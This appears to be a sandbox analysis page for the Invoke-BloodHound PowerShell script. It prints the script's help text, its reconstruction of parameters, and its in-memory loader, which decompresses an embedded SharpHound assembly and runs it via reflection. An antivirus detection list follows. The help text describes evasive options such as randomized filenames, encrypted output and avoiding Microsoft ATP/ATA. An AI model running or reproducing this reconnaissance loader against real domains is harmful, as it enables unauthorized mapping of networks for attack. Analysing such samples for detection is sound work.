Static | ZeroBOX
No static analysis available.
function Invoke-BloodHound
Runs the BloodHound C# Ingestor using reflection. The assembly is stored in this file.
Using reflection and assembly.load, load the compiled BloodHound C# ingestor into memory
and run it without touching disk. Parameters are converted to the equivalent CLI arguments
for the SharpHound executable and passed in via reflection. The appropriate function
calls are made in order to ensure that assembly dependencies are loaded properly.
.PARAMETER CollectionMethods
Specifies the CollectionMethods being used. Possible value are:
Group - Collect group membership information
LocalGroup - Collect local group information for computers
LocalAdmin - Collect local admin users for computers
RDP - Collect remote desktop users for computers
DCOM - Collect distributed COM users for computers
PSRemote - Collected members of the Remote Management Users group for computers
Session - Collect session information for computers
Trusts - Enumerate domain trust data
ACL - Collect ACL (Access Control List) data
Container - Collect GPO/OU Data
ComputerOnly - Collects Local Group and Session data
GPOLocalGroup - Collects Local Group information using GPO (Group Policy Objects)
LoggedOn - Collects session information using privileged methods (needs admin!)
ObjectProps - Collects node property information for users and computers
SPNTargets - Collects SPN targets (currently only MSSQL)
Default - Collects Group Membership, Local Admin, Sessions, Containers, ACLs and Domain Trusts
DcOnly - Collects Group Membership, ACLs, ObjectProps, Trusts, Containers, and GPO Admins
All - Collect all data
This can be a list of comma seperated valued as well to run multiple collection methods!
Specifies the domain to enumerate. If not specified, will enumerate the current
domain your user context specifies.
.PARAMETER SearchForest
Search all trusted domains in the forest.
Use stealth collection options, will sacrifice data quality in favor of much reduced
network impact
Append this ldap filter to the search filter to further filter the results enumerated
.PARAMETER DistinguishedName
DistinguishedName to start LDAP searches at. Equivalent to the old -Ou option
.PARAMETER ComputerFile
A file containing a list of computers to enumerate. This option can only be used with the following Collection Methods:
Session, Session, LocalGroup, ComputerOnly, LoggedOn
.PARAMETER OutputDirectory
Folder to output files too
.PARAMETER OutputPrefix
Prefix to add to output files
Name for the cache file dropped to disk (default: unique hash generated per machine)
Don't write the cache file to disk. Caching will still be performed in memory.
.PARAMETER RebuildCache
Invalidate and rebuild the cache file
.PARAMETER RandomFileNames
Randomize file names completely
.PARAMETER ZipFilename
Name for the zip file output by data collection
Do NOT zip the json files
.PARAMETER ZipPassword
Encrypt the zip file with the specified password
.PARAMETER TrackComputerCalls
Write a CSV file with the results of each computer API call to disk
.PARAMETER PrettyPrint
Output "pretty" json with formatting for readability
.PARAMETER LdapUsername
Username for connecting to LDAP. Use this if you're using a non-domain account for connecting to computers
.PARAMETER LdapPassword
Password for connecting to LDAP. Use this if you're using a non-domain account for connecting to computers
.PARAMETER DomainController
Domain Controller to connect too. Specifiying this can result in data loss
Port LDAP is running on. Defaults to 389/686 for LDAPS
Connect to LDAPS (LDAP SSL) instead of regular LDAP
.PARAMETER DisableCertVerification
Disable certificate verification for secure LDAP
.PARAMETER DisableSigning
Disables keberos signing/sealing, making LDAP traffic viewable
.PARAMETER SkipPortCheck
Skip SMB port checks when connecting to computers
.PARAMETER PortScanTimeout
Timeout for port checks
.PARAMETER SkipPasswordCheck
Skip checking of PwdLastSet time for computer scanning
Exclude domain controllers from enumeration (usefult o avoid Microsoft ATP/ATA)
Throttle requests to computers (in milliseconds)
Add jitter to throttle
Number of threads to run enumeration with (Default: 50)
.PARAMETER SkipRegistryLoggedOn
Disable remote registry check in LoggedOn collection
.PARAMETER OverrideUserName
Override username to filter for NetSessionEnum
Overrides the DNS name used for API calls
.PARAMETER CollectAllProperties
Collect all string LDAP properties on objects
Perform looping for computer collection
.PARAMETER LoopDuration
Duration to perform looping (Default 02:00:00)
.PARAMETER LoopInterval
Interval to sleep between loops (Default 00:05:00)
.PARAMETER StatusInterval
Interval for displaying status in milliseconds
.PARAMETER Verbosity
Change verbosity of output. Default 2 (lower is more)
Display this help screen
Display version information
PS C:\> Invoke-BloodHound
Executes the default collection options and exports JSONs to the current directory, compresses the data to a zip file,
and then removes the JSON files from disk
PS C:\> Invoke-BloodHound -Loop -LoopInterval 00:01:00 -LoopDuration 00:10:00
Executes session collection in a loop. Will wait 1 minute after each run to continue collection
and will continue running for 10 minutes after which the script will exit
PS C:\> Invoke-BloodHound -CollectionMethods All
Runs ACL, ObjectProps, Container, and Default collection methods, compresses the data to a zip file,
and then removes the JSON files from disk
PS C:\> Invoke-BloodHound -CollectionMethods DCOnly -NoSaveCache -RandomizeFilenames -EncryptZip
(Opsec!) Run LDAP only collection methods (Groups, Trusts, ObjectProps, ACL, Containers, GPO Admins) without outputting the cache file to disk.
Randomizes filenames of the JSON files and the zip file and adds a password to the zip file
[CmdletBinding(PositionalBinding = $false)]
$CollectionMethods = [String[]]@('Default'),
[ValidateScript({ Test-Path -Path $_ })]
$OutputDirectory = $( Get-Location ),
[ValidateRange(0, 65535)]
[ValidateRange(50, 5000)]
$PortCheckTimeout = 500,
[ValidateRange(0, 100)]
[ValidateRange(500, 60000)]
[ValidateRange(0, 5)]
$vars = New-Object System.Collections.Generic.List[System.Object]
if(!($PSBoundParameters.ContainsKey("help") -or $PSBoundParameters.ContainsKey("version"))){
$PSBoundParameters.Keys | % {
if ($_ -notmatch "verbosity"){
if($PSBoundParameters.item($_).gettype().name -notmatch "switch"){
elseif ($_ -match "verbosity") {
else {
$PSBoundParameters.Keys |? {$_ -match "help" -or $_ -match "version"}| % {
$passed = [string[]]$vars.ToArray()
$EncodedCompressedFile = 'zL0HXBPJGze+2YRUWigJHVTElQAWLICK2HtvKCr2DquJqGcI9t57vbP3XhHrnb2cnqdnpdjA3s9e4J1nZjbZIOd5v/f9fP5/P5Ld+c7sMzPPPGXazjbpMJORMgwjQ38FBQyzjyH/4ph//zcS/TkH7ndmdqvOF9snaXy+WOs+fU1BA418b2PXpKDuXZOT+cFB3XoGGVOSg/omB9Vu1iooie/RM8LJSR1MaTSvwzCNJVJm0WWXAwLd20xxiUZSlmGyXBjGh2BbP6P7ICFFHLlnSbnhn9wa5Ypx+CdluoxjGFf833a1XvC/johuM4pu1hVRySBXxhFddn9yYaJ+gCe25xhGKQoqUbi+KBwxuOewwUA3k9YL6sp+Q6JLhNFk7I7uSdlQyb3QJcfFLl0c+h9h7DmARwkdaZkxrXffpKtZuJgzP5M0UDaWcWBOP3BmnrpJGAkK5yK2jtyF4io4/3C1fbhHEkYeGsByiII6tDO5svppSMgkJXXSpRYUloXGUFxaOAhNGorouJdlrYVlg96gWIsfimI5GU7HoYCcdeCqwsXkgDAuCm65yuhXxsshkUkBcCUGF8csB8LFUQ74BgEKAVBQQCkASgqoBEBFAbUAqCmgEQANBRwFwJECTgLgRAFnAXCmgIsAuFDAVQBcKaAVAC0F3ATAjQLuAuBOAQ8B8KCApwB4UkAnADoK6AVATwEvAfCigLcAeFPARwB8KOArAL4U8BMAPwr4C4A/BQIEIIACgQIQSIEgAcA3/YxIFgZyqI3UUxFPJRxqHPVIKUSBzKD2B9nVujEcaiS1pQSKcGNYSzC+elqK42sqgUHoDDTEOYK8YrkrhXWB0bIcYri8ZLhrCOeEhNpYCjJGzaZWs1w4ipFzLvBMJRbKIA/yacEwiUR2pcwkSkOqlsp41JDqcCepsRwiIAOiarXMWBGoueEYmbG6EAjzY7kqiBq/G+UY5sKhBlWXDJeHGOuhFGqHMG0aVNXYAIXkhBLLGV
$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
$UncompressedFileBytes = New-Object Byte[](1046528)
$DeflatedStream.Read($UncompressedFileBytes, 0, 1046528) | Out-Null
$Assembly = [Reflection.Assembly]::Load($UncompressedFileBytes)
$BindingFlags = [Reflection.BindingFlags] "Public,Static"
$a = @()
$Assembly.GetType("Costura.AssemblyLoader", $false).GetMethod("Attach", $BindingFlags).Invoke($Null, @())
$Assembly.GetType("Sharphound.Program").GetMethod("InvokeSharpHound").Invoke($Null, @(,$passed))
Antivirus Signature
Bkav Clean
Lionic Hacktool.Script.PowerShell.3!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Trojan.GenericKD.67207512
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-Script.Save.2ec4e121
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Trojan Horse
ESET-NOD32 PowerShell/TrojanDropper.Agent.AHN
TrendMicro-HouseCall HackTool.PS1.Sharphound.VSNW0AG23
Avast Script:SNH-gen [PUP]
Cynet Malicious (score: 99)
Kaspersky HEUR:HackTool.Win32.Agent.gen
BitDefender Trojan.GenericKD.67207512
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.67207512
Tencent Trojan.PowerShell.Obfuscated.11027674
Sophos ATK/BloodH-B
F-Secure Trojan.TR/PShell.Agent.AS
DrWeb Tool.Bloodhound.6
VIPRE Trojan.GenericKD.67207512
TrendMicro HackTool.PS1.Sharphound.VSNW0AG23
FireEye Trojan.GenericKD.67207512
Emsisoft Trojan.GenericKD.67207512 (B)
GData Trojan.GenericKD.67207512
Jiangmin Clean
Varist PSH/SharpHound.A
Avira TR/PShell.Agent.AS
MAX malware (ai score=86)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D4018158
SUPERAntiSpyware Clean
ZoneAlarm HEUR:HackTool.Win32.Agent.gen
Microsoft Trojan:Win32/Leonem
Google Detected
AhnLab-V3 Trojan/Powershell.SharpHound.S2478
Acronis Clean
McAfee Generic
VBA32 Clean
Zoner Clean
Rising HackTool.SharpHound/PS!8.1604C (TOPIS:E0:b12esf8tyUJ)
Yandex Clean
Ikarus Trojan.PowerShell.Crypt
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [PUP]
Panda Trj/Sharp.A
CrowdStrike Clean
alibabacloud Trojan[dropper]:Win/Agent.AJS
No IRMA results available.